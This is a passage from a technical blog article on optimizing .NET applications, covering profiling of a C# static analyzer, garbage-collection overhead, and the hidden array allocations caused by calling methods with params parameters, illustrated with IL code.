described in Recovery in this chapter. In addition, write image journaling cannot eliminate database degradation in the following cases: A hardware malfunction that corrupts memory or storage. An operating system malfunction that corrupts memory, the filesystem, or storage. The WIJ is deleted. The loss of write-back cache contents. In the event of a power outage, the write-back cache could be lost, leading to database degradation. To prevent this degradation, ensure that either the storage array uses nonvolatile memory for its write-back cache or the volatile write-back cache has battery backup. If you believe that one of these situations has occurred, contact the InterSystems Worldwide Response Center (WRC) Opens in a new window.
https://docs.intersystems.com/healthconnectlatest/csp/docbook/DocBook.UI.Page.cls?KEY=GCDI_WIJ
CC-MAIN-2021-25
refinedweb
2,481
51.07
Content-type: text/html #include <sys/conf.h> #include <sys/ddi.h> #include <sys/sunddi.h> void disksort(struct diskhd *dp, struct buf *bp); Solaris DDI specific (Solaris DDI). dp A pointer to a diskhd structure. A diskhd structure is essentially identical to head of a buffer structure (see buf(9S)). The only defined items of interest for this structure are the av_forw and av_back structure elements which are used to maintain the front and tail pointers of the forward linked I/O request queue. bp A pointer to a buffer structure. Typically this is the I/O request that the driver receives in its strategy routine (see strategy(9E)). The driver is responsible for initializing the b_resid structure element to a meaningful sort key value prior to calling disksort(). The function disksort() sorts a pointer to a buffer into a single forward linked list headed by the av_forw element of the argument *dp. It uses a one-way elevator algorithm that sorts buffers into the queue in ascending order based upon a key value held in the argument buffer structure element b_resid. This value can either be the driver calculated cylinder number for the I/O request described by the buffer argument, or simply the absolute logical block for the I/O request, depending on how fine grained the sort is desired to be or how applicable either quantity is to the device in question. The head of the linked list is found by use of the av_forw structure element of the argument *dp. The tail of the linked list is found by use of the av_back structure element of the argument *dp. The av_forw element of the *bp argument is used by disksort() to maintain the forward linkage. The value at the head of the list presumably indicates the currently active disk area. This function can be called from user, interrupt, or kernel context. strategy(9E), buf(9S) Writing Device Drivers The disksort() function does no locking. Therefore, any locking is completely the responsibility of the caller.
http://backdrift.org/man/SunOS-5.10/man9f/disksort.9f.html
CC-MAIN-2016-44
refinedweb
339
55.13
Description Class for defining a clutch or a brake (1D model) between two one-degree-of-freedom parts; i.e., shafts that can be used to build 1D models of powertrains. #include <ChShaftsClutch.h> Member Function Documentation Method to allow deserialization of transient data from archives. Method to allow de serialization of transient data from archives. Reimplemented from chrono::ChShaftsCouple.. Use this function after gear creation, to initialize it, given two shafts to join.. Set the user modulation of the torque (or brake, if you use it between a fixed shaft and a free shaft). The modulation must range from 0 (switched off) to 1 (max torque). Default is 1, when clutch is created. You can update this during integration loop to simulate the pedal pushing by the driver. Set the transmissible torque limit (the maximum torque that the clutch can transmit between the two shafts). You can specify two values for backward/forward directions: usually these are equal (ex. -100,100) in most commercial clutches, but if you define (0,100), for instance, you can create a so called freewheel or overrunning clutch that works only in one direction. Set the transmissible torque limit (the maximum torque that the clutch can transmit between the two shafts), for both forward and backward direction.
http://api.projectchrono.org/classchrono_1_1_ch_shafts_clutch.html
CC-MAIN-2019-30
refinedweb
213
65.12
qj: logging designed for debugging. Project description qj logging designed for debugging (pronounced ‘queuedj’ /kjuːʤ/) An easy-to-use but very expressive logging function. If you have ever found yourself rewriting a list comprehension as a for loop, or splitting a line of code into three lines just to store and log an intermediate value, then this log function is for you. Overview: qj is meant to help debug python quickly with lightweight log messages that are easy to add and remove. On top of the basic logging functionality, qj also provides a collection of debugging helpers that are simple to use, including the ability to drop into the python debugger in the middle of a line of code. Examples: Instead of turning this: result = some_function(another_function(my_value)) into this: tmp = another_function(my_value) logging.info('tmp = %r', tmp) result = some_function(tmp) you can just do this: result = some_function(qj(another_function(my_value))) Instead of turning this: my_list = [process_value(value) for value in some_function(various, other, args) if some_condition(value)] into this: my_list = [] for value in some_function(various, other, args): logging.info('value = %r', value) condition = some_condition(value) logging.info('condition = %r', condition) if condition: final_value = process_value(value) logging.info('final_value = %r', final_value) my_list.append(final_value) logging.info('my_list = %r', my_list) you can keep it as the list comprehension: my_list = qj([qj(process_value(qj(value))) for value in some_function(various, other, args) if qj(some_condition(value))]) Philosophy: There are two reasons we add logs to our code: - We want to communicate something to the user of the code. - We want to debug. In python, as well as most other languages, the default logging mechanisms serve the first purpose well, but make things unnecessarily difficult for the second purpose. Debug logging should have no friction. When you have of a question about your code, you should not be tempted to just think hard to try to come up with the answer. Instead, you should know that you can type just a few characters to see the answer. You should never have to rewrite code just to check it for bugs. The most important feature of a debug logger is that it always returns its argument. This allows you to add logging calls pretty much anywhere in your code without having to rewrite your code or create temporary variables. This is a minimal implementation of qj: def qj(x): print(x) return x Once you have that core property, there are a lot of other useful things you find yourself wanting that make debugging easier. qj attempts to cleanly pull debugging-related features together into a very simple power-user interface. To that end, most argument names are single letters that are mnemonics for the particular feature: xis for the input that you want to log and return. sis for the string you want to describe x. dis for the debugger. bis for the boolean that turns everything off. lis for the lambda that lets you log more things. pis for printing public properties of x. nis for numpy array statistics. tis for printing tensorflow Tensors. ris for overriding the return value. zis for zeroing out the log count and automatic indentation of a particular log. A few less-commonly needed features get longer names: padis for padding a log message so that it stands out. tfcis for checking numerics on tensorflow Tensors. ticand tocare for measuring and logging timing of arbitrary chunks of code. timeis for measuring and logging timing stats for a callable. catchis for catching exceptions from a callable. log_all_callsis for wrapping xsuch that all public method calls and their return values get logged. The right description of x is usually its source code. If you want to log the value of a variable named long_variable_name, you shouldn't need to think about how to describe the variable in the log message so you can find it. Its name and the line number where you are logging it are its best description. qj(long_variable_name) logs something like this: qj: <some_file> some_func: long_variable_name <line_number>: <value of long_variable_name> Similarly, logging the value of a complicated expression should use the expression itself as the description. qj(foo * 2 + bar ** 2) logs something like: qj: <some_file> some_func: foo * 2 + bar ** 2 <line_number>: 42 You shouldn't need to import just to log debug messages. Ideally, something like qj would be available as a builtin in python. We can get pretty close to that ideal by providing a way to install qj into the global namespace after importing it the first time. This means that you can pretend qj is a builtin and use it in any python code that runs after you import it once, even if the original import is in some other file, package, or library. Adding logs should be easy. So should removing logs. The name qj is meant to be easy to type (two characters in opposite hands) and easy to search for and highlight in your code. 'qj' is one of the least frequently occurring bigrams based on a survey of millions of lines of python code, so it is hopefully very unlikely to occur naturally in your code. This property will help you find and remove all of your debug logs easily once you have fixed your bugs. Logs should be easy to read. qj defaults to using colors. The metadata and description of the log are in red. The value of the log is in green. Your debug logs will stand out strongly against whatever normal logging your code does. qj also works to align log messages nicely, where possible, to help you visually group related log messages together. Basic Usage: Install with pip: $ pip install qj Add the following import: from qj_global import qj This makes qj globally available in any python code that is run after the import. It's often nice to import qj from your main script once, since you can then use it in your entire project (and even in other python libraries). See Global Access for more information on importing. If your problem code looks like this: def problem_code(...): ... problem_array = [other_func(value, other_args) for value in compute_some_array(more_args) if some_tricky_condition] Make it look like this: def problem_code(...): ... problem_array = qj([qj(other_func(qj(value), qj(other_args))) for value in qj(compute_some_array(qj(more_args))) if qj(some_tricky_condition)]) In most cases, you shouldn't need to put logs on everything like that, of course. If your debug cycle is fast, you can add the logs more selectively to avoid getting overwhelmed by new logspam. These changes will result in detailed logs that tell you what function they are running in, what line number they are on, what source code for the log is, and what its value is. The log messages will also be indented some amount that corresponds to how many calls to qj are in the current code context. This is particularly useful with comprehensions, since python reports the last line of the comprehension in logs and stack traces, which is often not the correct line when dealing with long comprehensions (or even long argument lists). This is the general layout of the basic log message: [datetime] qj: <file> function: [indentation] source code or description <line>: value In the example above, the log messages might look like: qj: <some_file> problem_code: more_args <92>: ['list', 'of', 'more_args'] qj: <some_file> problem_code: compute_some_array(qj(more_args)) <92>: ['list', 'of', 'things', 'hey!'] qj: <some_file> problem_code: some_tricky_condition <92>: True qj: <some_file> problem_code: other_args <92>: ['list', 'of', 'other_args'] qj: <some_file> problem_code: value <92>: list qj: <some_file> problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return list qj: <some_file> problem_code: some_tricky_condition <92>: True qj: <some_file> problem_code: other_args <92>: ['list', 'of', 'other_args'] qj: <some_file> problem_code: value <92>: of qj: <some_file> problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return of qj: <some_file> problem_code: some_tricky_condition <92>: False qj: <some_file> problem_code: some_tricky_condition <92>: True qj: <some_file> problem_code: other_args <92>: ['list', 'of', 'other_args'] qj: <some_file> problem_code: value <92>: hey! qj: <some_file> problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return hey! qj: <some_file> problem_code: [qj(other_func(qj(value), qj(other_args))) ...] <92>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!'] Things to note in that output: - The indentation automatically gives a visual indicator of how the comprehension is being computed -- you can see how the loops happen and when an iteration gets skipped at a glance or so (e.g., the two lines with the same indention should jump out, and closer inspection shows that the if statement generated the False, which explains why the previous indentation pattern didn't repeat). - You didn't have to specify any logging strings -- qj extracted the source code from the call site. You can change the description string with qj(foo, 'this particular foo'): qj: <some_file> some_func: this particular foo <149>: foo If qj can't find the correct source code, it will log the type of the output instead. If that happens, or if you don't want to see the line of code, you might change the previous logging to look like this: def problem_code(...): ... problem_array = qj([qj(other_func(qj(value), qj(other_args)), 'other_func return') for value in qj(s='computed array', x=compute_some_array(qj(more_args))) if qj(s='if', x=some_tricky_condition)], 'problem_array') qj: <some_file> problem_code: more_args <153>: ['list', 'of', 'more_args'] qj: <some_file> problem_code: computed array <153>: ['list', 'of', 'things', 'hey!'] qj: <some_file> problem_code: if <153>: True qj: <some_file> problem_code: other_args <153>: ['list', 'of', 'other_args'] qj: <some_file> problem_code: value <153>: list qj: <some_file> problem_code: other_func return <153>: other_func_return list qj: <some_file> problem_code: if <153>: True qj: <some_file> problem_code: other_args <153>: ['list', 'of', 'other_args'] qj: <some_file> problem_code: value <153>: of qj: <some_file> problem_code: other_func return <153>: other_func_return of qj: <some_file> problem_code: if <153>: False qj: <some_file> problem_code: if <153>: True qj: <some_file> problem_code: other_args <153>: ['list', 'of', 'other_args'] qj: <some_file> problem_code: value <153>: hey! qj: <some_file> problem_code: other_func return <153>: other_func_return hey! qj: <some_file> problem_code: problem_array <153>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!'] Note that both positional arguments qj(value, 'val') and keyword arguments qj(s='val', x=value) can be used. Advanced Usage: These are ordered by the likelihood that you will want to use them. You can enter the debugger with qj(d=1): This drops you into the debugger -- it even works in jupyter notebooks! You can use this to drop into the debugger in the middle of executing a comprehension: [qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']] qj: <some_file> some_func: d=(value=='foo'), x=value <198>: foo > <some_file.py>(198)some_func() ----> 198 [qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']] ipdb> value 'foo' You can selectively turn logging off with qj(foo, b=0): This can be useful if you only care about logging when a particular value shows up: [qj(b=('f' in value), x=value) for value in ['foo', 'bar']] qj: <some_file> some_func: b=('f' in value), x=value <208>: foo Note the lack of a log for 'bar'. If logging is disabled for any reason, the other argument-based features will not trigger either: qj(foo, d=1, b=(foo == 'foo')) This will only drop into the debugger if foo == 'foo'. Logging can be disabled for three reasons: b=False, as described above. qj.LOG = False(see Parameters below). - You are attempting to print more than qj.MAX_FRAME_LOGSin the current stack frame (see Parameters below). You can log extra context with qj(foo, l=lambda _: other_vars): This is useful for logging other variables in the same context: [qj(foo, l=lambda _: other_comp_var) for foo, other_comp_var in ...] qj: <some_file> some_func: foo, l=lambda _: other_comp_var <328>: foo qj: <some_file> some_func: ['other', 'comprehension', 'var'] qj: <some_file> some_func: foo, l=lambda _: other_comp_var <328>: bar qj: <some_file> some_func: ['other', 'comprehension', 'var'] The input ( x) is passed as the argument to the lambda: qj(foo, l=lambda x: x.replace('f', 'z')) qj: <some_file> some_func: foo, l=lambda x: x.replace('f', 'z') <336>: foo qj: <some_file> some_func: zoo Note that qj attempts to nicely align the starts of log messages that are all generated from the same call to qj. You can log the timing of arbitrary code chunks with qj(tic=1) ... qj(toc=1): qj(tic=1) do_a_bunch() of_things() qj(toc=1) qj: <some_file> some_func: tic=1 <347>: Adding tic. qj: <some_file> some_func: toc=1 <350>: Computing toc. qj: 2.3101 seconds since tic=1. You can nest tic and toc: qj(tic=1) do_something() qj(tic=2) do_something_else() qj(toc=1) finish_up() qj(toc=1) qj: <some_file> some_func: tic=1 <348>: Adding tic. qj: <some_file> some_func: tic=2 <350>: Adding tic. qj: <some_file> some_func: toc=1 <352>: Computing toc. qj: 0.5200 seconds since tic=2. qj: <some_file> some_func: toc=1 <354>: Computing toc. qj: 1.3830 seconds since tic=1. Since any True value will turn on tic, you can use it as a convenient identifier, as above where tic=2 is the second tic. The actual identifier printed by toc is whatever description string was used for the tic, though, so you can give descriptive names just as in any other log message: qj(foo, 'start foo', tic=1) foo.start() qj(foo.finish(), toc=1) qj: <some_file> some_func: start foo <367>: <Foo object at 0x1165579d0> qj: Added tic. qj: <some_file> some_func: foo.finish(), toc=1 <369>: Foo.SUCCESSFUL_FINISH qj: 5.9294 seconds since start foo. You can use tic and toc in the same call to log the duration of any looping code: [qj(x, tic=1, toc=1) for x in [1, 2, 3]] qj: <some_file> some_func: x, tic=1, toc=1 <380>: 1 qj: Added tic. qj: <some_file> some_func: x, tic=1, toc=1 <380>: 2 qj: 0.0028 seconds since x, tic=1, toc=1. qj: Added tic. qj: <some_file> some_func: x, tic=1, toc=1 <380>: 3 qj: 0.0028 seconds since x, tic=1, toc=1. qj: Added tic. You can use toc=-1 to clear out all previous tics: qj(tic=1) do_something() qj(tic=2) do_something_else() qj(tic=3) finish_up() qj(toc=-1) qj: <some_file> some_func: tic=1 <394>: Adding tic. qj: <some_file> some_func: tic=2 <396>: Adding tic. qj: <some_file> some_func: tic=3 <398>: Adding tic. qj: <some_file> some_func: toc=1 <400>: Computing toc. qj: 0.2185 seconds since tic=3. qj: 0.5200 seconds since tic=2. qj: 1.3830 seconds since tic=1. You can log the public properties for the input with qj(foo, p=1): qj(some_object, p=1) qj: <some_file> some_func: some_object, p=1: some_object.__str__() output qj: Public properties: some_method(a, b=None, c='default') some_public_property Note that this can be dangerous. In order to log the method signatures, Python's inspect module can actually cause code to execute on your object. Specifically, if you have @property getters on your object, that code will be run. If your @property getter changes state, using this flag to print the object's public API will change your object's state, which might make your debugging job even harder. (Of course, you should never change state in a getter.) This is generally useful to quickly check the API of an unfamiliar object while working in a jupyter notebook. You can log some useful stats about x instead of its value with qj(arr, n=1): qj: <some_file> some_func: arr, n=1 (shape (min (mean std) max) hist) <257>: ((100, 1), (0.00085, (0.46952, 0.2795), 0.97596), array([25, 14, 23, 23, 15])) This only works if the input ( x) is a numeric numpy array or can be cast to one, and if numpy has already been imported somewhere in your code. Otherwise, the value of x is logged as normal. The log string is augmented with a key to the different parts of the logged value. The final value is a histogram of the array values. The number of histogram buckets defaults to 5, but can be increased by passing an integer to n greater than 5: qj(arr, n=10) qj: <some_file> some_func: arr, n=10 ...: (..., array([11, 14, 8, 6, 10, 13, 14, 9, 7, 8])) You can add a tensorflow.Print call to x with y = qj(some_tensor, t=1): qj: <some_file> some_func: some_tensor, t=1 <258>: Tensor("some_tensor:0", ...) qj: Wrapping return value in tf.Print operation. And then later: sess.run(y) qj: <some_file> some_func: some_tensor, t=1 <258>: [10 1] [[0.64550841]... Note that the Tensorflow output includes the shape of the tensor first ( [10 1]), followed by its value. This only works if x is a tf.Tensor object and tensorflow has already been imported somewhere in your code. The number of logs printed from the tf.Print call is qj.MAX_FRAME_LOGS (described below, defaults to 200) if t is True. Otherwise, it is set to int(t). Thus, t=1 prints once, but t=True prints 200 times. You can also turn on numerics checking for any tf.Tensor with y = qj(some_tensor, tfc=1): For example, log(0) is not a number: y = qj(tf.log(tensor_with_zeros), tfc=1) qj: <some_file> some_func: tf.log(tensor_with_zeros), tfc=1 <258>: Tensor("Log:0", ...) qj: Wrapping return value in tf.check_numerics. And then later: sess.run(y) InvalidArgumentError: qj: <some_file> some_func: tf.log(tensor_with_zeros), tfc=1 <258> : Tensor had Inf values Note that tf.check_numerics is very slow, so you won't want to leave these in your graph. This also only works if x is a tf.Tensor object and tensorflow has already been imported somewhere in your code. You can override the return value of qj by passing any value to r: some_function(normal_arg, special_flag=qj(some_value, r=None)) qj: <some_file> some_func: some_value, r=None <272>: some flag value qj: Overridden return value: None As in the example, this can be useful to temporarily change or turn off a value being passed to a function, rather than having to delete the value, which you might forget about. You can add timing logs to any function with @qj(time=1) or qj(foo, time=100): @qj(time=1) def foo(): ... qj: <some_file> module_level_code: time=1 <343>: Preparing decorator to measure timing... qj: Decorating <function foo at 0x111b2bc80> with timing function. foo() qj: <some_file> some_func: Average timing for <function foo at 0x111c3eb18> across 1 call <343>: 0.0021 seconds Note that the log message is reported from the location of the call to the function that generated the message (in this case, line 343 in some_file.py, inside of some_func). Setting time to a larger integer value will report timing stats less freqently: foo = qj(foo, time=1000) for _ in range(1000): foo() qj: <some_file> some_func: foo, time=1000 <359>: <function foo at 0x111b2be60> qj: Wrapping return value in timing function. qj: <some_file> some_func: Average timing for <function foo at 0x111b2be60> across 1000 calls <361>: 0.0023 seconds You can catch exceptions and drop into the debugger with @qj(catch=1) or qj(foo, catch=<subclass of Exception>): @qj(catch=1) def foo(): raise Exception('FOO!') qj: <some_file> module_level_code: catch=1 <371>: Preparing decorator to catch exceptions... qj: Decorating <function foo at 0x112086f50> with exception function. foo() qj: <some_file> some_func: Caught an exception in <function foo at 0x112086f50> <377>: FOO! > <some_file.py>(377)<some_func>() ----> 1 foo() ipdb> This can be particularly useful in comprehensions where you want to be able to inspect the state of the comprehension that led to an exception: [qj(foo, catch=1)(x) for x in [1, 2, 3]] qj: <some_file> some_func: foo, catch=1 <389>: <function foo at 0x1129dd7d0> qj: Wrapping return value in exception function. qj: <some_file> some_func: Caught an exception in <function foo at 0x1129dd7d0> <389>: FOO! ... > <some_file.py>(389)<some_func>() ----> 1 [qj(foo, catch=1)(x) for x in [1, 2, 3]] ipdb> x 1 Setting catch will always drop into the debugger when an exception is caught -- this feature is for debugging exceptions, not for replacing appropriate use of try: ... except:. You can log all future calls to an object with qj(foo, log_all_calls=1): s = qj('abc', log_all_calls=1) qj: <some_file> some_func: 'abc', log_all_calls=1 <380>: abc qj: Wrapping all public method calls for object. s.replace('a', 'b') qj: <some_file> some_func: calling replace <385>: replace('a', 'b') qj: <some_file> some_func: returning from replace <385>: bbc This can break your code in a variety of ways and fail silently in other ways, but some problems are much easier to debug with this functionality. For example, figuring out why sequences of numbers from a seeded random number generator differ on different runs with the same seed: rng = qj(np.random.RandomState(1), log_all_calls=1) qj: <some_file> some_func: np.random.RandomState(1), log_all_calls=1 <395>: <mtrand.RandomState object at 0x10c16e780> qj: Wrapping all function calls for object. for k in set(list('abcdefghijklmnop')): rng.randint(ord(k)) # First run: qj: <some_file> some_func: calling randint <413>: randint(97) qj: <some_file> some_func: returning from randint <413>: 37 qj: <some_file> some_func: calling randint <413>: randint(99) qj: <some_file> some_func: returning from randint <413>: 12 qj: <some_file> some_func: calling randint <413>: randint(98) qj: <some_file> some_func: returning from randint <413>: 72 ... # Subsequent run with a reseeded rng: qj: <some_file> some_func: calling randint <413>: randint(101) qj: <some_file> some_func: returning from randint <413>: 9 qj: <some_file> some_func: calling randint <413>: randint(100) qj: <some_file> some_func: returning from randint <413>: 75 qj: <some_file> some_func: calling randint <413>: randint(103) qj: <some_file> some_func: returning from randint <413>: 5 ... This fails (in theory, but not as written) because sets are iterated in an undefined order. Similar failures are possible with much more subtle structure. Comparing different series of log calls makes it very easy to find exactly where the series diverge, which gives a good chance of figuring out what the bug is. You can make particular log messages stand out with qj(foo, pad=<str or int>): qj(foo, pad='#') ################################################## qj: <some_file> some_func: foo, pad='#' <461>: foo ################################################## Similarly, add blank lines: qj(foo, pad=3) # Some other log message... qj: <some_file> some_func: foo, pad=3 <470>: foo # The next log message... Parameters: There are seven global parameters for controlling the logger: qj.LOG: Turns logging on or off globally. Starts out set to True, so logging is on. qj.LOG_FN: Which log function to use. All log messages are passed to this function as a fully-formed string, so the only constraints are that this function takes a single parameter, and that it is a function -- e.g., you can't set qj.LOG_FN = printunless you are using from __future__ import print_function(although you can define your own log function that just calls print if you don't like the default). Defaults to logging.infowrapped in a lambda to support colorful logs. qj.STR_FN: Which string conversion function to use. All objects to be logged are passed to this function directly, so it must take an arbitrary python object and return a python string. Defaults to str, but a nice override is pprint.pformat. qj.MAX_FRAME_LOGS: Limits the number of times per stack frame the logger will print for each qj call. If the limit is hit, it prints an informative message after the last log of the frame. Defaults to 200. qj.COLOR: Turns colored log output on or off globally. Starts out set to True, so colorized logging is on. qj.PREFIX: String that all qj logs will use as a prefix. Defaults to 'qj: '. qj.DEBUG_FN: Which debugger to use. You shouldn't need to set this in most situations. The function needs to take a single argument, which is the stack frame that the logger should start in. If this is not set, then the first time debugging is requested, qj attempts to load ipdb. If ipdb isn't available, it falls back to using pdb. In both cases, qj.DEBUG_FNis set to the respective set_tracefunction in a manner that supports setting the stack frame. Global Access: In many cases when debugging, you need to dive into many different files across many different modules. In those cases, it is nice to have a single logging and debugging interface that is immediately available in all of the files you touch, without having to import anything additional in each file. To support this use case, you can call the following function after importing in one file: from qj import qj qj.make_global() This will add qj to python's equivalent of a global namespace, allowing you to call qj from any python code that runs after the call to qj.make_global(), no matter what file or module it is in. When using qj from a jupyter notebook, qj.make_global() is automatically called when qj is imported. As described in Basic Usage, you can also just use: from qj_global import qj This is generally what you want, but qj does not force you to pollute the global namespace if you don't want to (except in jupyter notebooks). qj Magic Warning: qj adds a local variable to the stack frame it is called from. That variable is __qj_magic_wocha_doin__. If you happen to have a local variable with the same name and you call qj, you're going to have a bad time. Testing: qj has extensive tests. You can run them with nosetests: $ nosetests ........................................................................................ ---------------------------------------------------------------------- Ran 88 tests in 1.341s OK Or you can run them directly: $ python qj/tests/qj_test.py ........................................................................................ ---------------------------------------------------------------------- Ran 88 tests in 1.037s OK If you have both python 2.7 and python 3.6+ installed, you can test both versions: $ nosetests --where=qj/tests --py3where=qj/tests --py3where=/qjtests3 $ python3 qj/tests/qj_test.py $ python3 qj/tests3/qj_test.py Disclaimer: This project is not an official Google project. It is not supported by Google and Google specifically disclaims all warranties as to its quality, merchantability, or fitness for a particular purpose. Contributing: See how to contribute. License: Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/qj/
CC-MAIN-2022-27
refinedweb
4,329
63.49
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. Change default 'name' value in account.invoice.tax object Hi Guys, From this post: The first answer states this: ----- Invoice Reports Tax detail 'Tax code - Tax Name' it is default functionality in Openerp 7. ----- I Would like to change the default from 'Tax code - Tax Name', to simply 'Tax Name', however, I cannot work out how to make this change. In fact, I have added a custom field to the 'account.tax' object, called x_description_short, which I would prefer to use instead, however, if someone can point me in the direction of HOW to change the default value, I should be able to work out the rest. To clarify, I am running openerp online via odoo.com Regards, Ludo, it seems that I cannot comment directly to your post, probably due to lack of 'reputation' or something like that. Thanks for your answer, however, how can I apply that change on the odoo.com online service? Ow, I see. I totally missed that part. I do not know if you are allowed to create custom modules on the online service. If that would be the case, create a small module that does just that. If not, I think you will have no luck with my suggested method. Maybe someone else has another idea? I don't think that I can When inheriting account.tax, you can overwrite the "name_get" method. You can use that method to make Odoo return a custom value for each time the record appears somewhere on a list or form. Note: This is system-wide, so ALL the occurences of account.tax will use this method to determine the display-name. This is an example as found in the standard account module: def name_get(self, cr, uid, ids, context=None): if not ids: return [] types = { 'out_invoice': _('Invoice'), 'in_invoice': _('Supplier Invoice'), 'out_refund': _('Refund'), 'in_refund': _('Supplier Refund'), } return [(r['id'], '%s %s' % (r['number'] or types[r['type']], r['name'] or '')) for r in self.read(cr, uid, ids, ['type', 'number', 'name'], context, load='_classic_write')] About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/change-default-name-value-in-account-invoice-tax-object-56644
CC-MAIN-2018-09
refinedweb
396
73.58
# Optimization of .NET applications: a big result of small edits ![0852_NETAppsPerf_MinChangesMajorRes/image1.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/4f4/53f/118/4f453f1183ece492558bec6218169e91.png) Today we're going to discuss how small optimizations in the right places of the application can improve its performance. Imagine: we remove the creation of an extra iterator in one place, get rid of boxing in the other. As a result, we get drastic improvements because of such small edits. One old and simple idea runs like a golden thread through the article. Please, remember it. Premature optimizations are evil. Sometimes it happens that optimization and readability go in slightly different directions. Code may work better, but it is harder to read and maintain. And vice versa — code is easy to read and modify but has some performance problems. Therefore, it is important to understand what we are willing to sacrifice in such cases. A developer may read the article, rush to edit a project's code base and… get no performance improvements. And code becomes more complex. That's why it is important to (always) approach the case with a cool head. It is great if you know your application's bottlenecks where optimization can help. Otherwise, various profilers are here to the rescue. They can provide a large amount of information about the application. In particular, describe its behavior in dynamics. For example, instances of what types are created the most frequently, how much time the application spends on garbage collection, how long a particular code fragment is executed etc. Two JetBrains tools are worth mentioning: [dotTrace](https://www.jetbrains.com/profiler/) and [dotMemory](https://www.jetbrains.com/dotmemory/). They are convenient and collect a lot of information. Besides, it is perfectly visualized. JetBrains, you're cool! But let's get back to the optimizations. Throughout the article we'll analyze several cases that we have faced and that seemed the most interesting. Each of described edits gave positive result, as it was made in the bottlenecks marked by the profilers. Unfortunately, I did not record the results of each change I made, but I'll show the general optimization result at the end of the article. **Note**: This article is about working with .NET Framework. As experience shows (see the example with [Enum.GetHashCode](https://pvs-studio.com/en/blog/posts/csharp/0844/)), sometimes the same C# code fragment may demonstrate a more optimal performance on .NET Core / .NET than on .NET Framework. And what, in fact, are we optimizing? ------------------------------------- The tips, described in the article, are relevant to every .NET application. Again, the edits are the most useful when done in the bottlenecks. Beware that we are not going to delve into any abstract theoretical reasoning. In this context, the "change the code to avoid the creation of one iterator" type of tips would look bizarre. All the problems listed in this article were identified after I profiled the [PVS-Studio static analyzer](https://pvs-studio.com/en/pvs-studio/) for C#. The main purpose of profiling was to reduce the analysis time. After the work started, it quickly became clear that the analyzer had serious problems with garbage collection. It took a significant amount of time. In fact, we'd known this before, just made sure of it once again. By the way, earlier we had done several optimizations of the analyzer and we have [a separate article](https://pvs-studio.com/en/blog/posts/csharp/0836/) on that. However, the problem was still relevant. Look at the screenshot below ([full-size image is here](https://import.viva64.com/docx/blog/0852_NETAppsPerf_MinChangesMajorRes/image3.png)). This is the result I got after profiling the PVS-Studio C#. It used 8 threads — 8 lines in the screenshot. The garbage collection clearly took a significant time in each thread. ![0852_NETAppsPerf_MinChangesMajorRes/image3.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/62b/d51/acb/62bd51acb8b5ee38f28f452c3f96dde0.png) We rejected "rewrite everything in C" advice and got to work. In particular, we examined the results of the profiling and locally deleted unnecessary extra/temporary objects. To our luck, this approach immediately showed results. This is going to be the main topic of the article. What did we gain? Let's keep the intrigue until the end of the article. Calling methods with a params parameter --------------------------------------- Methods with a *params* parameter declared in their signature, can take the following as an argument: * no values; * one or more values. For example, here is a method with a signature like this: ``` static void ParamsMethodExample(params String[] stringValue) ``` Let's look at its IL code: ``` .method private hidebysig static void ParamsMethodExample(string[] stringValue) cil managed { .param [1] .custom instance void [mscorlib]System.ParamArrayAttribute::.ctor() = ( 01 00 00 00 ) .... } ``` This is a simple method with one parameter, marked with the *System.ParamArrayAttribute*. The strings array is specified as the parameter type. **Fun fact**. The compiler issues the [CS0674](https://docs.microsoft.com/en-us/dotnet/csharp/misc/cs0674) error and forces you to use the *params* keyword — no way to use this attribute directly. A very simple conclusion follows from the IL code. Each time we need to call this method, the caller code has to create an array. Well, almost. Let's look at the following examples to better understand what's happening when you call this method with various arguments. The first call is without arguments. ``` ParamsMethodExample() ``` IL code: ``` call !!0[] [mscorlib]System.Array::Empty() call void Optimizations.Program::ParamsMethodExample(string[]) ``` The method expects an array as input, so we need to get it somewhere. In this case we use a result of calling the static *System.Array.Empty* method as an argument. This allows us to avoid creating empty collections and reduce the pressure on GC*.* And now the sad part. Older versions of the compiler can generate different IL code. Like this: ``` ldc.i4.0 newarr [mscorlib]System.String call void Optimizations.Program::ParamsMethodExample(string[]) ``` In this case a new empty array is created every time we call a method that has no corresponding argument for the *params* parameter. Time to test yourself. Do the following calls differ? If so, in what way? ``` ParamsMethodExample(null); ParamsMethodExample(String.Empty); ``` Found an answer? Let's figure it out. Let's start with the call when the argument is an explicit *null*: ``` ParamsMethodExample(null); ``` IL code: ``` ldnull call void Optimizations.Program::ParamsMethodExample(string[]) ``` The array is not created in this case. The method takes *null* as an argument. Let's look at the case when we pass a non-null value to the method: ``` ParamsMethodExample(String.Empty); ``` IL code: ``` ldc.i4.1 newarr [mscorlib]System.String dup ldc.i4.0 ldsfld string [mscorlib]System.String::Empty stelem.ref call void Optimizations.Program::ParamsMethodExample(string[]) ``` Here the code is already longer than in the previous example. An array gets created before calling the method. All the arguments, that had been passed to the method's *params* parameter, get into the array. In this case an empty string is written to the array. Note that an array is also created if there are several arguments. It's created even if the arguments are explicit *null* values. Thus, calling methods with the *params* parameters can play a trick on you if you do not expect the implicit array creation. In some cases the compiler can optimize the method call — remove the creation of an extra array. But overall, remember about temporary objects. The profiler spotted several places where many arrays were created and collected by GC. In the corresponding methods, the code looked approximately like this: ``` bool isLoop = node.IsKindEqual(SyntaxKind.ForStatement, SyntaxKind.ForEachStatement, SyntaxKind.DoStatement, SyntaxKind.WhileStatement); ``` The *IsKindEqual* method looked like this: ``` public static bool IsKindEqual(this SyntaxNode node, params SyntaxKind[] kinds) { return kinds.Any(kind => node.IsKind(kind)); } ``` We need to create an array to call the method. After we traverse the array, it becomes unnecessary. Can we get rid of creating unnecessary arrays? Easy: ``` bool isLoop = node.IsKind(SyntaxKind.ForStatement) || node.IsKind(SyntaxKind.ForEachStatement) || 